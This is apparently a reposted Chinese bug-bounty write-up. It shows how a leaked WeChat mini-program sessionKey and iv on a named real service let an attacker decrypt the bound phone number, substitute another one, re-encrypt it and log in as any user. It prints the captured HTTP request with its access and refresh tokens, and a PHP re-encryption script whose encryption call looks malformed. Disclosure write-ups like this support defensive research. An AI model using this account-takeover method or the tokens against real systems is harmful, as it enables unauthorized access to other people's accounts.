【Tips】某SRC高危—sessionKey泄露导致任意用户登录

admin

138858
文章

114
评论

2023年10月23日09:11:26评论194 views字数 2783阅读9分16秒阅读模式

【Tips】某SRC高危—sessionKey泄露导致任意用户登录

这里可以看到泄露的iv和sessionKey

【Tips】某SRC高危—sessionKey泄露导致任意用户登录

POST /api/ncdos/uc/sso/applet/bind/mobile HTTP/1.1Host: hm.city.pingan.comConnection: closeContent-Length: 337sign: 276610e073e53b4adf8bf3c0098e2f14content-type: application/jsonrealm: Ctimestamp: 1665224644307clientid: HM_CUser-Agent: Mozilla/5.0 (Linux; Android 5.1.1; HD1910 Build/LMY48Z; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/52.0.2743.100 Mobile Safari/537.36 MMWEBID/8585 MicroMessenger/8.0.3.1880(0x28000334) Process/appbrand0 WeChat/arm32 Weixin NetType/WIFI Language/zh_CN ABI/arm32 MiniProgramEnv/androidAccept-Encoding: gzip, deflateterminal: H5charset: utf-8refreshtoken: 99cfd3788d6849045115585665ed271faccesstoken: ad82b9ca8ad5b179d64ac77bcfd113e5nonce: ysbzlsbtjdwwReferer: https://servicewechat.com/wxad6a45778949f5cc/1/page-frame.html{"iv":"zFRZO0sUflC+AAXwE4Kb6w==","encryptedData":"bObdppTXRfppTTkjfPdu09AGeNdR3MLdmz2aL4+YfhD9+MgDU6cOs//7S6gw+94V9WlzeNhXT6v9xd0GwhdDUiH2HMo4iVlQPGEbxqg+swsd840r4KnZ8QEohuIrRsxu8F6qiz6c9z2KNEjLieMNg2Djys0AQB2KNH73iFKIPzPuM/yX/MuJOWwRM/2HYtER1pXmYYUucccccfKAU778fXA==","appId":"wxcccccc778949f5cc","sessionKey":"nInM5GccccccyPsy5efzQ=="}

POST /api/ncdos/uc/sso/applet/bind/mobile HTTP/1.1 Host: hm.city.pingan.com Connection: close Content-Length: 337 sign: 276610e073e53b4adf8bf3c0098e2f14 content-type: application/json realm: C timestamp: 1665224644307 clientid: HM_C User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; HD1910 Build/LMY48Z; wv) Ap pleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/52.0.2743.100 Mobi le Safari/537.36 MMWEBID/8585 MicroMessenger/8.0.3.1880(0x28000334) Proces s/appbrand0 WeChat/arm32 Weixin NetType/WIFI Language/zh_CN ABI/arm32 Mini ProgramEnv/android Accept-Encoding: gzip, deflate terminal: H5 charset: utf-8 refreshtoken: 99cfd3788d6849045115585665ed271f accesstoken: ad82b9ca8ad5b179d64ac77bcfd113e5 nonce: ysbzlsbtjdww Referer: https://servicewechat.com/wxad6a45778949f5cc/1/

{"iv":"zFRZO0sUflC+AAXwE4Kb6w==","encryptedData":"bObdppTXRfppTTkjfPdu09AG eNdR3MLdmz2aL4+YfhD9+MgDU6cOs//7S6gw+94V9WlzeNhXT6v9xd0GwhdDUiH2HMo4iVlQPG Ebxqg+swsd840r4KnZ8QEohuIrRsxu8F6qiz6c9z2KNEjLieMNg2Djys0AQB2KNH73iFKIPzPu M/yX/MuJOWwRM/2HYtER1pXmYYUug8jnfKAU778fXA==","appId":"wxad6a45778949f5c c","sessionKey":"nInM5GcdijaFGyPsy5efzQ=="}

获取iv + sessionKey 后，我们写一个脚本进行解密

【Tips】某SRC高危—sessionKey泄露导致任意用户登录

获取手机号码后，替换手机号进行加密。然后替换加密数据进行登录。

<?phpecho "请输⼊SessionKey: ";$sessionKey = fgets(STDIN);echo "请输⼊本次解密IV: ";$iv = fgets(STDIN);echo "请输⼊待加密内容: ";$decryptedData = fgets(STDIN);function encryptData($decryptedData, $iv, $sessionKey){ $aesIV = base64_decode($iv); $aesCipher = $decryptedData; $aesKey = base64_decode($sessionKey); $result = openssl_encrypt($aesCipher, $aesKey, 0, $aesIV); $dataObj = json_decode($result); return $result;}

{"phoneNumber":"17333333333","purePhoneNumber":"17333333333","countryCode":"86","watermark":{"timestamp":1665224642,"appid":"wx89xxxxcc"}}

【Tips】某SRC高危—sessionKey泄露导致任意用户登录

更多实战案例可加入【红蓝攻防成长圈】

【Tips】某SRC高危—sessionKey泄露导致任意用户登录

End

原文始发于微信公众号（贝雷帽SEC）：【Tips】某SRC高危—sessionKey泄露导致任意用户登录

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

【Tips】某SRC高危—sessionKey泄露导致任意用户登录

文件上传黑名单限制的绕过总结

metasploit（1）生成远控木马

Ghost

利用Claude3.7分析wireshark流量包

JS逆向 —— 基于 gRPC 的加解密对抗

Nyx-1 综合靶机实战思路

打靶日记 Pinkys Palace v2

内存取证 - 练习篇3(Lovelymem一把梭)

一文玩转验证码漏洞

HTB_Nocturnal

发表评论

在线咨询

微信